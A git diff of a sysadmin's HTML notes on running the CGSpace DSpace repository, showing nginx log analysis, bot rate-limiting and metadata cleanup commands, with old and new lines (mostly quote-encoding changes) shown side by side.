10 dspaceCli
13 dspaceWeb
@ -987,19 +987,19 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-03-22 | sort -u | wc -l
<li>Make a minor edit to my <code>agrovoc-lookup.py</code> script to match subject terms with parentheses like <code>COCOA (PLANT)</code></li>
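<li>The change is essentially allowing parentheses in the match pattern, something like this sketch (the real script may differ):</li>
</ul>
<pre tabindex="0"><code>$ python2 -c &#34;import re; print(re.match(r&#39;^[A-Z ()]+$&#39;, &#39;COCOA (PLANT)&#39;) is not None)&#34;
True
</code></pre><ul>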
<li>Test 89 corrections and 79 deletions for AGROVOC subject terms from the ones I cleaned up in the last week</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2019-03-26-AGROVOC-89-corrections.csv -db dspace -u dspace -p 'fuuu' -f dc.subject -m 57 -t correct -d -n
$ ./delete-metadata-values.py -i /tmp/2019-03-26-AGROVOC-79-deletions.csv -db dspace -u dspace -p 'fuuu' -m 57 -f dc.subject -d -n
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2019-03-26-AGROVOC-89-corrections.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.subject -m 57 -t correct -d -n
$ ./delete-metadata-values.py -i /tmp/2019-03-26-AGROVOC-79-deletions.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 57 -f dc.subject -d -n
</code></pre><ul>
<li>UptimeRobot says CGSpace is down again, but it seems to just be slow, as the load is over 10.0</li>
<li>Looking at the nginx logs I don&rsquo;t see anything terribly abusive, but SemrushBot has made ~3,000 requests to Discovery and Browse pages today:</li>
</ul>
<pre tabindex="0"><code># grep SemrushBot /var/log/nginx/access.log | grep -E &quot;26/Mar/2019&quot; | grep -E '(discover|browse)' | wc -l
<pre tabindex="0"><code># grep SemrushBot /var/log/nginx/access.log | grep -E &#34;26/Mar/2019&#34; | grep -E &#39;(discover|browse)&#39; | wc -l
2931
</code></pre><ul>
<li>So I&rsquo;m adding it to the badbot rate limiting in nginx, and actually, I kinda feel like just blocking all user agents with &ldquo;bot&rdquo; in the name for a few days to see if things calm down&hellip; maybe not just yet</li>
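<li>Before anything that drastic it would be worth counting how many of today&rsquo;s requests even mention &ldquo;bot&rdquo; (a rough sketch; this also matches robots.txt hits, so it overcounts):</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &#34;26/Mar/2019&#34; | grep -ci bot
</code></pre><ul>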
<li>Otherwise, these are the top users in the web and API logs the last hour (18&ndash;19):</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &quot;26/Mar/2019:(18|19)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &#34;26/Mar/2019:(18|19)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
54 41.216.228.158
65 199.47.87.140
75 157.55.39.238
@ -1010,7 +1010,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-03-26-AGROVOC-79-deletions.csv -db ds
277 2a01:4f8:13b:1296::2
291 66.249.66.80
328 35.174.184.209
# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &quot;26/Mar/2019:(18|19)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &#34;26/Mar/2019:(18|19)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
2 2409:4066:211:2caf:3c31:3fae:2212:19cc
2 35.10.204.140
2 45.251.231.45
@ -1025,7 +1025,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-03-26-AGROVOC-79-deletions.csv -db ds
<li>For the XMLUI I see <code>18.195.78.144</code> and <code>18.196.196.108</code> requesting only CTA items and with no user agent</li>
<li>They are responsible for almost 1,000 XMLUI sessions today:</li>
</ul>
<pre tabindex="0"><code>$ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=(18.195.78.144|18.196.196.108)' dspace.log.2019-03-26 | sort | uniq | wc -l
<pre tabindex="0"><code>$ grep -o -E &#39;session_id=[A-Z0-9]{32}:ip_addr=(18.195.78.144|18.196.196.108)&#39; dspace.log.2019-03-26 | sort | uniq | wc -l
937
</code></pre><ul>
<li>I will add their IPs to the list of bot IPs in nginx so I can tag them as bots to let Tomcat&rsquo;s Crawler Session Manager Valve to force them to re-use their session</li>
@ -1033,7 +1033,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-03-26-AGROVOC-79-deletions.csv -db ds
<li>I will add curl to the Tomcat Crawler Session Manager because anyone using curl is most likely an automated read-only request</li>
<li>I will add GuzzleHttp to the nginx badbots rate limiting, because it is making requests to dynamic Discovery pages</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep 45.5.184.72 | grep -E &quot;26/Mar/2019:&quot; | grep -E '(discover|browse)' | wc -l
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep 45.5.184.72 | grep -E &#34;26/Mar/2019:&#34; | grep -E &#39;(discover|browse)&#39; | wc -l
119
</code></pre><ul>
<li>What&rsquo;s strange is that I can&rsquo;t see any of their requests in the DSpace log&hellip;</li>
@ -1045,7 +1045,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-03-26-AGROVOC-79-deletions.csv -db ds
<li>Run the corrections and deletions to AGROVOC (dc.subject) on DSpace Test and CGSpace, and then start a full re-index of Discovery</li>
<li>What the hell is going on with this CTA publication?</li>
</ul>
<pre tabindex="0"><code># grep Spore-192-EN-web.pdf /var/log/nginx/access.log | awk '{print $1}' | sort | uniq -c | sort -n
<pre tabindex="0"><code># grep Spore-192-EN-web.pdf /var/log/nginx/access.log | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n
1 37.48.65.147
1 80.113.172.162
2 108.174.5.117
@ -1077,7 +1077,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-03-26-AGROVOC-79-deletions.csv -db ds
</li>
<li>In other news, I see that it&rsquo;s not even the end of the month yet and we have 3.6 million hits already:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/* | grep -cE &quot;[0-9]{1,2}/Mar/2019&quot;
<pre tabindex="0"><code># zcat --force /var/log/nginx/* | grep -cE &#34;[0-9]{1,2}/Mar/2019&#34;
3654911
</code></pre><ul>
<li>In other other news I see that DSpace has no statistics for years before 2019 currently, yet when I connect to Solr I see all the cores up</li>
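<li>One way to double check the cores from the command line (a sketch against the same local Solr admin API):</li>
</ul>
<pre tabindex="0"><code>$ curl -s &#39;http://localhost:8081/solr/admin/cores?action=STATUS&amp;wt=json&#39; | grep -oE &#39;&#34;name&#34;:&#34;statistics[^&#34;]*&#34;&#39;
</code></pre><ul>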
@ -1105,7 +1105,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-03-26-AGROVOC-79-deletions.csv -db ds
<li>It is frustrating to see that the load spikes from our own legitimate load on the server were <em>very</em> aggravated and drawn out by the contention for CPU on this host</li>
<li>We had 4.2 million hits this month according to the web server logs:</li>
</ul>
<pre tabindex="0"><code># time zcat --force /var/log/nginx/* | grep -cE &quot;[0-9]{1,2}/Mar/2019&quot;
<pre tabindex="0"><code># time zcat --force /var/log/nginx/* | grep -cE &#34;[0-9]{1,2}/Mar/2019&#34;
4218841
real 0m26.609s
@ -1114,7 +1114,7 @@ sys 0m2.551s
</code></pre><ul>
<li>Interestingly, now that the CPU steal is not an issue the REST API is ten seconds faster than it was in <a href="/cgspace-notes/2018-10/">2018-10</a>:</li>
</ul>
<pre tabindex="0"><code>$ time http --print h 'https://cgspace.cgiar.org/rest/items?expand=metadata,bitstreams,parentCommunityList&amp;limit=100&amp;offset=0'
<pre tabindex="0"><code>$ time http --print h &#39;https://cgspace.cgiar.org/rest/items?expand=metadata,bitstreams,parentCommunityList&amp;limit=100&amp;offset=0&#39;
...
0.33s user 0.07s system 2% cpu 17.167 total
0.27s user 0.04s system 1% cpu 16.643 total
@ -1137,7 +1137,7 @@ sys 0m2.551s
<li>Looking at the weird issue with shitloads of downloads on the <a href="https://cgspace.cgiar.org/handle/10568/100289">CTA item</a> again</li>
<li>The item was added on 2019-03-13 and these three IPs have attempted to download the item&rsquo;s bitstream 43,000 times since it was added eighteen days ago:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.{2..17}.gz | grep 'Spore-192-EN-web.pdf' | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 5
<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.{2..17}.gz | grep &#39;Spore-192-EN-web.pdf&#39; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 5
42 196.43.180.134
621 185.247.144.227
8102 18.194.46.84
@ -1168,16 +1168,16 @@ sys 0m2.551s
</ul>
</li>
</ul>
<pre tabindex="0"><code>_altmetric.embed_callback({&quot;title&quot;:&quot;Distilling the role of ecosystem services in the Sustainable Development Goals&quot;,&quot;doi&quot;:&quot;10.1016/j.ecoser.2017.10.010&quot;,&quot;tq&quot;:[&quot;Progress on 12 of 17 #SDGs rely on #ecosystemservices - new paper co-authored by a number of&quot;,&quot;Distilling the role of ecosystem services in the Sustainable Development Goals - new paper by @SNAPPartnership researchers&quot;,&quot;How do #ecosystemservices underpin the #SDGs? Our new paper starts counting the ways. Check it out in the link below!&quot;,&quot;Excellent paper about the contribution of #ecosystemservices to SDGs&quot;,&quot;So great to work with amazing collaborators&quot;],&quot;altmetric_jid&quot;:&quot;521611533cf058827c00000a&quot;,&quot;issns&quot;:[&quot;2212-0416&quot;],&quot;journal&quot;:&quot;Ecosystem Services&quot;,&quot;cohorts&quot;:{&quot;sci&quot;:58,&quot;pub&quot;:239,&quot;doc&quot;:3,&quot;com&quot;:2},&quot;context&quot;:{&quot;all&quot;:{&quot;count&quot;:12732768,&quot;mean&quot;:7.8220956572788,&quot;rank&quot;:56146,&quot;pct&quot;:99,&quot;higher_than&quot;:12676701},&quot;journal&quot;:{&quot;count&quot;:549,&quot;mean&quot;:7.7567299270073,&quot;rank&quot;:2,&quot;pct&quot;:99,&quot;higher_than&quot;:547},&quot;similar_age_3m&quot;:{&quot;count&quot;:386919,&quot;mean&quot;:11.573702536454,&quot;rank&quot;:3299,&quot;pct&quot;:99,&quot;higher_than&quot;:383619},&quot;similar_age_journal_3m&quot;:{&quot;count&quot;:28,&quot;mean&quot;:9.5648148148148,&quot;rank&quot;:1,&quot;pct&quot;:96,&quot;higher_than&quot;:27}},&quot;authors&quot;:[&quot;Sylvia L.R. Wood&quot;,&quot;Sarah K. Jones&quot;,&quot;Justin A. Johnson&quot;,&quot;Kate A. Brauman&quot;,&quot;Rebecca Chaplin-Kramer&quot;,&quot;Alexander Fremier&quot;,&quot;Evan Girvetz&quot;,&quot;Line J. Gordon&quot;,&quot;Carrie V. Kappel&quot;,&quot;Lisa Mandle&quot;,&quot;Mark Mulligan&quot;,&quot;Patrick O'Farrell&quot;,&quot;William K. Smith&quot;,&quot;Louise Willemen&quot;,&quot;Wei Zhang&quot;,&quot;Fabrice A. 
DeClerck&quot;],&quot;type&quot;:&quot;article&quot;,&quot;handles&quot;:[&quot;10568/89975&quot;,&quot;10568/89846&quot;],&quot;handle&quot;:&quot;10568/89975&quot;,&quot;altmetric_id&quot;:29816439,&quot;schema&quot;:&quot;1.5.4&quot;,&quot;is_oa&quot;:false,&quot;cited_by_posts_count&quot;:377,&quot;cited_by_tweeters_count&quot;:302,&quot;cited_by_fbwalls_count&quot;:1,&quot;cited_by_gplus_count&quot;:1,&quot;cited_by_policies_count&quot;:2,&quot;cited_by_accounts_count&quot;:306,&quot;last_updated&quot;:1554039125,&quot;score&quot;:208.65,&quot;history&quot;:{&quot;1y&quot;:54.75,&quot;6m&quot;:10.35,&quot;3m&quot;:5.5,&quot;1m&quot;:5.5,&quot;1w&quot;:1.5,&quot;6d&quot;:1.5,&quot;5d&quot;:1.5,&quot;4d&quot;:1.5,&quot;3d&quot;:1.5,&quot;2d&quot;:1,&quot;1d&quot;:1,&quot;at&quot;:208.65},&quot;url&quot;:&quot;http://dx.doi.org/10.1016/j.ecoser.2017.10.010&quot;,&quot;added_on&quot;:1512153726,&quot;published_on&quot;:1517443200,&quot;readers&quot;:{&quot;citeulike&quot;:0,&quot;mendeley&quot;:248,&quot;connotea&quot;:0},&quot;readers_count&quot;:248,&quot;images&quot;:{&quot;small&quot;:&quot;https://badges.altmetric.com/?size=64&amp;score=209&amp;types=tttttfdg&quot;,&quot;medium&quot;:&quot;https://badges.altmetric.com/?size=100&amp;score=209&amp;types=tttttfdg&quot;,&quot;large&quot;:&quot;https://badges.altmetric.com/?size=180&amp;score=209&amp;types=tttttfdg&quot;},&quot;details_url&quot;:&quot;http://www.altmetric.com/details.php?citation_id=29816439&quot;})
<pre tabindex="0"><code>_altmetric.embed_callback({&#34;title&#34;:&#34;Distilling the role of ecosystem services in the Sustainable Development Goals&#34;,&#34;doi&#34;:&#34;10.1016/j.ecoser.2017.10.010&#34;,&#34;tq&#34;:[&#34;Progress on 12 of 17 #SDGs rely on #ecosystemservices - new paper co-authored by a number of&#34;,&#34;Distilling the role of ecosystem services in the Sustainable Development Goals - new paper by @SNAPPartnership researchers&#34;,&#34;How do #ecosystemservices underpin the #SDGs? Our new paper starts counting the ways. Check it out in the link below!&#34;,&#34;Excellent paper about the contribution of #ecosystemservices to SDGs&#34;,&#34;So great to work with amazing collaborators&#34;],&#34;altmetric_jid&#34;:&#34;521611533cf058827c00000a&#34;,&#34;issns&#34;:[&#34;2212-0416&#34;],&#34;journal&#34;:&#34;Ecosystem Services&#34;,&#34;cohorts&#34;:{&#34;sci&#34;:58,&#34;pub&#34;:239,&#34;doc&#34;:3,&#34;com&#34;:2},&#34;context&#34;:{&#34;all&#34;:{&#34;count&#34;:12732768,&#34;mean&#34;:7.8220956572788,&#34;rank&#34;:56146,&#34;pct&#34;:99,&#34;higher_than&#34;:12676701},&#34;journal&#34;:{&#34;count&#34;:549,&#34;mean&#34;:7.7567299270073,&#34;rank&#34;:2,&#34;pct&#34;:99,&#34;higher_than&#34;:547},&#34;similar_age_3m&#34;:{&#34;count&#34;:386919,&#34;mean&#34;:11.573702536454,&#34;rank&#34;:3299,&#34;pct&#34;:99,&#34;higher_than&#34;:383619},&#34;similar_age_journal_3m&#34;:{&#34;count&#34;:28,&#34;mean&#34;:9.5648148148148,&#34;rank&#34;:1,&#34;pct&#34;:96,&#34;higher_than&#34;:27}},&#34;authors&#34;:[&#34;Sylvia L.R. Wood&#34;,&#34;Sarah K. Jones&#34;,&#34;Justin A. Johnson&#34;,&#34;Kate A. Brauman&#34;,&#34;Rebecca Chaplin-Kramer&#34;,&#34;Alexander Fremier&#34;,&#34;Evan Girvetz&#34;,&#34;Line J. Gordon&#34;,&#34;Carrie V. Kappel&#34;,&#34;Lisa Mandle&#34;,&#34;Mark Mulligan&#34;,&#34;Patrick O&#39;Farrell&#34;,&#34;William K. Smith&#34;,&#34;Louise Willemen&#34;,&#34;Wei Zhang&#34;,&#34;Fabrice A. DeClerck&#34;],&#34;type&#34;:&#34;article&#34;,&#34;handles&#34;:[&#34;10568/89975&#34;,&#34;10568/89846&#34;],&#34;handle&#34;:&#34;10568/89975&#34;,&#34;altmetric_id&#34;:29816439,&#34;schema&#34;:&#34;1.5.4&#34;,&#34;is_oa&#34;:false,&#34;cited_by_posts_count&#34;:377,&#34;cited_by_tweeters_count&#34;:302,&#34;cited_by_fbwalls_count&#34;:1,&#34;cited_by_gplus_count&#34;:1,&#34;cited_by_policies_count&#34;:2,&#34;cited_by_accounts_count&#34;:306,&#34;last_updated&#34;:1554039125,&#34;score&#34;:208.65,&#34;history&#34;:{&#34;1y&#34;:54.75,&#34;6m&#34;:10.35,&#34;3m&#34;:5.5,&#34;1m&#34;:5.5,&#34;1w&#34;:1.5,&#34;6d&#34;:1.5,&#34;5d&#34;:1.5,&#34;4d&#34;:1.5,&#34;3d&#34;:1.5,&#34;2d&#34;:1,&#34;1d&#34;:1,&#34;at&#34;:208.65},&#34;url&#34;:&#34;http://dx.doi.org/10.1016/j.ecoser.2017.10.010&#34;,&#34;added_on&#34;:1512153726,&#34;published_on&#34;:1517443200,&#34;readers&#34;:{&#34;citeulike&#34;:0,&#34;mendeley&#34;:248,&#34;connotea&#34;:0},&#34;readers_count&#34;:248,&#34;images&#34;:{&#34;small&#34;:&#34;https://badges.altmetric.com/?size=64&amp;score=209&amp;types=tttttfdg&#34;,&#34;medium&#34;:&#34;https://badges.altmetric.com/?size=100&amp;score=209&amp;types=tttttfdg&#34;,&#34;large&#34;:&#34;https://badges.altmetric.com/?size=180&amp;score=209&amp;types=tttttfdg&#34;},&#34;details_url&#34;:&#34;http://www.altmetric.com/details.php?citation_id=29816439&#34;})
</code></pre><ul>
<li>The response payload for the second one is the same:</li>
</ul>
<pre tabindex="0"><code>_altmetric.embed_callback({&quot;title&quot;:&quot;Distilling the role of ecosystem services in the Sustainable Development Goals&quot;,&quot;doi&quot;:&quot;10.1016/j.ecoser.2017.10.010&quot;,&quot;tq&quot;:[&quot;Progress on 12 of 17 #SDGs rely on #ecosystemservices - new paper co-authored by a number of&quot;,&quot;Distilling the role of ecosystem services in the Sustainable Development Goals - new paper by @SNAPPartnership researchers&quot;,&quot;How do #ecosystemservices underpin the #SDGs? Our new paper starts counting the ways. Check it out in the link below!&quot;,&quot;Excellent paper about the contribution of #ecosystemservices to SDGs&quot;,&quot;So great to work with amazing collaborators&quot;],&quot;altmetric_jid&quot;:&quot;521611533cf058827c00000a&quot;,&quot;issns&quot;:[&quot;2212-0416&quot;],&quot;journal&quot;:&quot;Ecosystem Services&quot;,&quot;cohorts&quot;:{&quot;sci&quot;:58,&quot;pub&quot;:239,&quot;doc&quot;:3,&quot;com&quot;:2},&quot;context&quot;:{&quot;all&quot;:{&quot;count&quot;:12732768,&quot;mean&quot;:7.8220956572788,&quot;rank&quot;:56146,&quot;pct&quot;:99,&quot;higher_than&quot;:12676701},&quot;journal&quot;:{&quot;count&quot;:549,&quot;mean&quot;:7.7567299270073,&quot;rank&quot;:2,&quot;pct&quot;:99,&quot;higher_than&quot;:547},&quot;similar_age_3m&quot;:{&quot;count&quot;:386919,&quot;mean&quot;:11.573702536454,&quot;rank&quot;:3299,&quot;pct&quot;:99,&quot;higher_than&quot;:383619},&quot;similar_age_journal_3m&quot;:{&quot;count&quot;:28,&quot;mean&quot;:9.5648148148148,&quot;rank&quot;:1,&quot;pct&quot;:96,&quot;higher_than&quot;:27}},&quot;authors&quot;:[&quot;Sylvia L.R. Wood&quot;,&quot;Sarah K. Jones&quot;,&quot;Justin A. Johnson&quot;,&quot;Kate A. Brauman&quot;,&quot;Rebecca Chaplin-Kramer&quot;,&quot;Alexander Fremier&quot;,&quot;Evan Girvetz&quot;,&quot;Line J. Gordon&quot;,&quot;Carrie V. Kappel&quot;,&quot;Lisa Mandle&quot;,&quot;Mark Mulligan&quot;,&quot;Patrick O'Farrell&quot;,&quot;William K. Smith&quot;,&quot;Louise Willemen&quot;,&quot;Wei Zhang&quot;,&quot;Fabrice A. 
DeClerck&quot;],&quot;type&quot;:&quot;article&quot;,&quot;handles&quot;:[&quot;10568/89975&quot;,&quot;10568/89846&quot;],&quot;handle&quot;:&quot;10568/89975&quot;,&quot;altmetric_id&quot;:29816439,&quot;schema&quot;:&quot;1.5.4&quot;,&quot;is_oa&quot;:false,&quot;cited_by_posts_count&quot;:377,&quot;cited_by_tweeters_count&quot;:302,&quot;cited_by_fbwalls_count&quot;:1,&quot;cited_by_gplus_count&quot;:1,&quot;cited_by_policies_count&quot;:2,&quot;cited_by_accounts_count&quot;:306,&quot;last_updated&quot;:1554039125,&quot;score&quot;:208.65,&quot;history&quot;:{&quot;1y&quot;:54.75,&quot;6m&quot;:10.35,&quot;3m&quot;:5.5,&quot;1m&quot;:5.5,&quot;1w&quot;:1.5,&quot;6d&quot;:1.5,&quot;5d&quot;:1.5,&quot;4d&quot;:1.5,&quot;3d&quot;:1.5,&quot;2d&quot;:1,&quot;1d&quot;:1,&quot;at&quot;:208.65},&quot;url&quot;:&quot;http://dx.doi.org/10.1016/j.ecoser.2017.10.010&quot;,&quot;added_on&quot;:1512153726,&quot;published_on&quot;:1517443200,&quot;readers&quot;:{&quot;citeulike&quot;:0,&quot;mendeley&quot;:248,&quot;connotea&quot;:0},&quot;readers_count&quot;:248,&quot;images&quot;:{&quot;small&quot;:&quot;https://badges.altmetric.com/?size=64&amp;score=209&amp;types=tttttfdg&quot;,&quot;medium&quot;:&quot;https://badges.altmetric.com/?size=100&amp;score=209&amp;types=tttttfdg&quot;,&quot;large&quot;:&quot;https://badges.altmetric.com/?size=180&amp;score=209&amp;types=tttttfdg&quot;},&quot;details_url&quot;:&quot;http://www.altmetric.com/details.php?citation_id=29816439&quot;})
<pre tabindex="0"><code>_altmetric.embed_callback({&#34;title&#34;:&#34;Distilling the role of ecosystem services in the Sustainable Development Goals&#34;,&#34;doi&#34;:&#34;10.1016/j.ecoser.2017.10.010&#34;,&#34;tq&#34;:[&#34;Progress on 12 of 17 #SDGs rely on #ecosystemservices - new paper co-authored by a number of&#34;,&#34;Distilling the role of ecosystem services in the Sustainable Development Goals - new paper by @SNAPPartnership researchers&#34;,&#34;How do #ecosystemservices underpin the #SDGs? Our new paper starts counting the ways. Check it out in the link below!&#34;,&#34;Excellent paper about the contribution of #ecosystemservices to SDGs&#34;,&#34;So great to work with amazing collaborators&#34;],&#34;altmetric_jid&#34;:&#34;521611533cf058827c00000a&#34;,&#34;issns&#34;:[&#34;2212-0416&#34;],&#34;journal&#34;:&#34;Ecosystem Services&#34;,&#34;cohorts&#34;:{&#34;sci&#34;:58,&#34;pub&#34;:239,&#34;doc&#34;:3,&#34;com&#34;:2},&#34;context&#34;:{&#34;all&#34;:{&#34;count&#34;:12732768,&#34;mean&#34;:7.8220956572788,&#34;rank&#34;:56146,&#34;pct&#34;:99,&#34;higher_than&#34;:12676701},&#34;journal&#34;:{&#34;count&#34;:549,&#34;mean&#34;:7.7567299270073,&#34;rank&#34;:2,&#34;pct&#34;:99,&#34;higher_than&#34;:547},&#34;similar_age_3m&#34;:{&#34;count&#34;:386919,&#34;mean&#34;:11.573702536454,&#34;rank&#34;:3299,&#34;pct&#34;:99,&#34;higher_than&#34;:383619},&#34;similar_age_journal_3m&#34;:{&#34;count&#34;:28,&#34;mean&#34;:9.5648148148148,&#34;rank&#34;:1,&#34;pct&#34;:96,&#34;higher_than&#34;:27}},&#34;authors&#34;:[&#34;Sylvia L.R. Wood&#34;,&#34;Sarah K. Jones&#34;,&#34;Justin A. Johnson&#34;,&#34;Kate A. Brauman&#34;,&#34;Rebecca Chaplin-Kramer&#34;,&#34;Alexander Fremier&#34;,&#34;Evan Girvetz&#34;,&#34;Line J. Gordon&#34;,&#34;Carrie V. Kappel&#34;,&#34;Lisa Mandle&#34;,&#34;Mark Mulligan&#34;,&#34;Patrick O&#39;Farrell&#34;,&#34;William K. Smith&#34;,&#34;Louise Willemen&#34;,&#34;Wei Zhang&#34;,&#34;Fabrice A. DeClerck&#34;],&#34;type&#34;:&#34;article&#34;,&#34;handles&#34;:[&#34;10568/89975&#34;,&#34;10568/89846&#34;],&#34;handle&#34;:&#34;10568/89975&#34;,&#34;altmetric_id&#34;:29816439,&#34;schema&#34;:&#34;1.5.4&#34;,&#34;is_oa&#34;:false,&#34;cited_by_posts_count&#34;:377,&#34;cited_by_tweeters_count&#34;:302,&#34;cited_by_fbwalls_count&#34;:1,&#34;cited_by_gplus_count&#34;:1,&#34;cited_by_policies_count&#34;:2,&#34;cited_by_accounts_count&#34;:306,&#34;last_updated&#34;:1554039125,&#34;score&#34;:208.65,&#34;history&#34;:{&#34;1y&#34;:54.75,&#34;6m&#34;:10.35,&#34;3m&#34;:5.5,&#34;1m&#34;:5.5,&#34;1w&#34;:1.5,&#34;6d&#34;:1.5,&#34;5d&#34;:1.5,&#34;4d&#34;:1.5,&#34;3d&#34;:1.5,&#34;2d&#34;:1,&#34;1d&#34;:1,&#34;at&#34;:208.65},&#34;url&#34;:&#34;http://dx.doi.org/10.1016/j.ecoser.2017.10.010&#34;,&#34;added_on&#34;:1512153726,&#34;published_on&#34;:1517443200,&#34;readers&#34;:{&#34;citeulike&#34;:0,&#34;mendeley&#34;:248,&#34;connotea&#34;:0},&#34;readers_count&#34;:248,&#34;images&#34;:{&#34;small&#34;:&#34;https://badges.altmetric.com/?size=64&amp;score=209&amp;types=tttttfdg&#34;,&#34;medium&#34;:&#34;https://badges.altmetric.com/?size=100&amp;score=209&amp;types=tttttfdg&#34;,&#34;large&#34;:&#34;https://badges.altmetric.com/?size=180&amp;score=209&amp;types=tttttfdg&#34;},&#34;details_url&#34;:&#34;http://www.altmetric.com/details.php?citation_id=29816439&#34;})
</code></pre><ul>
<li>Very interesting to see this in the response:</li>
</ul>
<pre tabindex="0"><code>&quot;handles&quot;:[&quot;10568/89975&quot;,&quot;10568/89846&quot;],
&quot;handle&quot;:&quot;10568/89975&quot;
<pre tabindex="0"><code>&#34;handles&#34;:[&#34;10568/89975&#34;,&#34;10568/89846&#34;],
&#34;handle&#34;:&#34;10568/89975&#34;
</code></pre><ul>
<li>On further inspection I see that the Altmetric explorer pages for each of these Handles are actually doing the right thing:
<ul>

View File

@ -64,7 +64,7 @@ $ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-4-regions.csv -db dspace -u ds
$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-2-countries.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 228 -f cg.coverage.country -d
$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 231 -f cg.coverage.region -d
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -163,16 +163,16 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
</ul>
</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep 'Spore-192-EN-web.pdf' | grep -E '(18.196.196.108|18.195.78.144|18.195.218.6)' | awk '{print $9}' | sort | uniq -c | sort -n | tail -n 5
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep &#39;Spore-192-EN-web.pdf&#39; | grep -E &#39;(18.196.196.108|18.195.78.144|18.195.218.6)&#39; | awk &#39;{print $9}&#39; | sort | uniq -c | sort -n | tail -n 5
4432 200
</code></pre><ul>
<li>In the last two weeks there have been 47,000 downloads of this <em>same exact PDF</em> by these three IP addresses</li>
<li>Apply country and region corrections and deletions on DSpace Test and CGSpace:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-9-countries.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.country -m 228 -t ACTION -d
$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-4-regions.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.region -m 231 -t action -d
$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-2-countries.csv -db dspace -u dspace -p 'fuuu' -m 228 -f cg.coverage.country -d
$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace -u dspace -p 'fuuu' -m 231 -f cg.coverage.region -d
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-9-countries.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.coverage.country -m 228 -t ACTION -d
$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-4-regions.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.coverage.region -m 231 -t action -d
$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-2-countries.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 228 -f cg.coverage.country -d
$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 231 -f cg.coverage.region -d
</code></pre><h2 id="2019-04-02">2019-04-02</h2>
<ul>
<li>CTA says the Amazon IPs are AWS gateways for real user traffic</li>
@ -191,7 +191,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ cat dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/bioversity.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort -u &gt; /tmp/2019-04-03-orcid-ids.txt
<pre tabindex="0"><code>$ cat dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/bioversity.txt | grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; | sort -u &gt; /tmp/2019-04-03-orcid-ids.txt
</code></pre><ul>
<li>We currently have 1177 unique ORCID identifiers, and this brings our total to 1237!</li>
<li>Next I will resolve all their names using my <code>resolve-orcids.py</code> script:</li>
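<li>That script essentially asks the public ORCID API for each identifier; a single lookup looks roughly like this (a sketch using httpie and jq against the v2.1 public API):</li>
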